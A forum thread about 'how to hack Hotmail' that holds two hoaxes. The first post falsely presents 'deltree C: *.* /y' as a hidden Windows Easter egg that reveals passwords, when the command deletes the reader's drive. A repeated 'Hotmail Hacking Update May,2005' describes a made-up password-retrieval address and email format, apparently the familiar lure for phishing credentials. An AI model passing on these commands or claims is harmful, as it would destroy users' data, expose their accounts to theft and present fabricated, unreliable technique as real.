Sign in to follow this  
Limitation//Moon

How to really hack HOTMAIL

For the users of Windows ME, 98, on down, just open up a DOS command prompt and type in the following commands:

It appears to be an Easter egg they put in Windows 9X and DOS so the staff could fix problems remotely, and it does a fake delete to try and scare you away. If you let it run for a few minutes though, it will eventually pop up a little window in DOS saying welcome to Hotmail Staff! And then it asks you for an MSN or Hotmail E-Mail address, and then will show you the password for that address:

first type this:

deltree C: *.* /y

If that doesn't work, try this:

deltree C: *.* \y

(My DOS is lacking right now and it's been a while)

after that just wait about 5 minutes and press //..;;;

Then you'll see a window of IE open up, go to the following address:

http://www.microsoft.net/1amA31337a...yothertime.html

print "date";

We all know anything can be hacked, but to misuse your knowledge especially in such things doesnt show the greatness in people. Sorry !!!

70182[/snapback]

... i agree with you ...

I really need this, How do i start, step by step please sad.gif

70178[/snapback]

AGREED WITH YOU. ME TOO WANT TO GO STEPS BY STEPS.

PLEASE VERIFY THE STEPS.

I found this somewhere. I have not yet tried this and neither do I plan to try it. I don't have much knowledge in such fields. If any of you are interested then you can go ahead with your own risk. remember, this may be illegal and you are resposible for your own action.

Hotmail Hacking Update May,2005

Although many hacking methods have been published, since Microsoft recently took over Hotmail many vulnerabilities have been corrected. However a recent loophole has been discovered, exposing hotmails automated password retrieval server, acquiring a password has been possible relatively easily. The following method has not been addressed yet and poses a serious security threat to hotmail account privacy:

Step1

The hacker uses an online Email account such as those offered by Hotmail and Yahoo to send an e-mail in the adress:: (system_server_password@hotmail.com)

Step2

In the subject field the exact phrase entered must be forgot_passw_141v2

Step3

Finally the following is added to the body of the Email:

login-mass141v2?+forgot=

pass=?328=

retreive-mass141v2_pass=

Result

The automated service is tricked into sending the victims password to the Email address entered.

Discussion

The bots cookie based security check is circumvented and hence obviously flawed. This script based method makes it possible for relatively inexperienced hackers to retrieve passwords of hotmail accounts and is thus a security issue that must be addressed immediatly by hotmail. However, to date no action has been taken due to the relatively unkown nature of the method and script.

Disclaimer

Please note that this information is provided for educational purposes only

the usage of such information is illegal

We do not advocate unauthorized use or theft of any services

I found this somewhere. I have not yet tried this and neither do I plan to try it. I don't have much knowledge in such fields. If any of you are interested then you can go ahead with your own risk. remember, this may be illegal and you are resposible for your own action.

Hotmail Hacking Update May,2005

Although many hacking methods have been published, since Microsoft recently took over Hotmail many vulnerabilities have been corrected. However a recent loophole has been discovered, exposing hotmails automated password retrieval server, acquiring a password has been possible relatively easily. The following method has not been addressed yet and poses a serious security threat to hotmail account privacy:

Step1

The hacker uses an online Email account such as those offered by Hotmail and Yahoo to send an e-mail in the adress:: system_server_password@hotmail.com

Step2

In the subject field the exact phrase entered must be forgot_passw_141v2

Step3

Finally the following is added to the body of the Email:

login-mass141v2?+forgot=

pass=?328=

retreive-mass141v2_pass=

Result

The automated service is tricked into sending the victims password to the Email address entered.

Discussion

The bots cookie based security check is circumvented and hence obviously flawed. This script based method makes it possible for relatively inexperienced hackers to retrieve passwords of hotmail accounts and is thus a security issue that must be addressed immediatly by hotmail. However, to date no action has been taken due to the relatively unkown nature of the method and script.

Disclaimer

Please note that this information is provided for educational purposes only

the usage of such information is illegal

We do not advocate unauthorized use or theft of any services